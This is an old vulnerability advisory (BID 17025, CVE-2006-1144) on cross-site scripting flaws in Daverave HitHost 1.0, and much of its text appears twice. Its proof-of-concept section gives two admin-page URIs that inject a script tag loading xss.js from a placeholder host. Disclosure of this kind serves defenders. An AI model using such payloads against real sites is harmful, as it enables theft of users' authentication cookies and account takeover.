Daverave HitHost Multiple Cross-Site Scripting Vulnerabilities
BID:17025
Info
Daverave HitHost Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 17025 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-1144 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 07 2006 12:00AM |
| Updated: | Feb 20 2007 08:28PM |
| Credit: | retard is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Daverave HitHost 1.0 |
| Not Vulnerable: | |
Discussion
Daverave HitHost Multiple Cross-Site Scripting Vulnerabilities
HitHost is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
HitHost is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Exploit / POC
Daverave HitHost Multiple Cross-Site Scripting Vulnerabilities
This issue can be exploited through a web client.
The following proof-of-concept URIs are available:
http://www.example.com/admin/deleteuser.php?user=<script%20src=http://www.example.com/xss.js></script>
http://www.example.com/admin/viewuser.php?hits=<script%20src=http://www.exmaple.com/xss.js></script>
This issue can be exploited through a web client.
The following proof-of-concept URIs are available:
http://www.example.com/admin/deleteuser.php?user=<script%20src=http://www.example.com/xss.js></script>
http://www.example.com/admin/viewuser.php?hits=<script%20src=http://www.exmaple.com/xss.js></script>
Solution / Fix
Daverave HitHost Multiple Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
References
Daverave HitHost Multiple Cross-Site Scripting Vulnerabilities
References:
References:
- HitHost Homepage (Daverave)
- histhost v1.0.0 xss and possible rmdir (retard)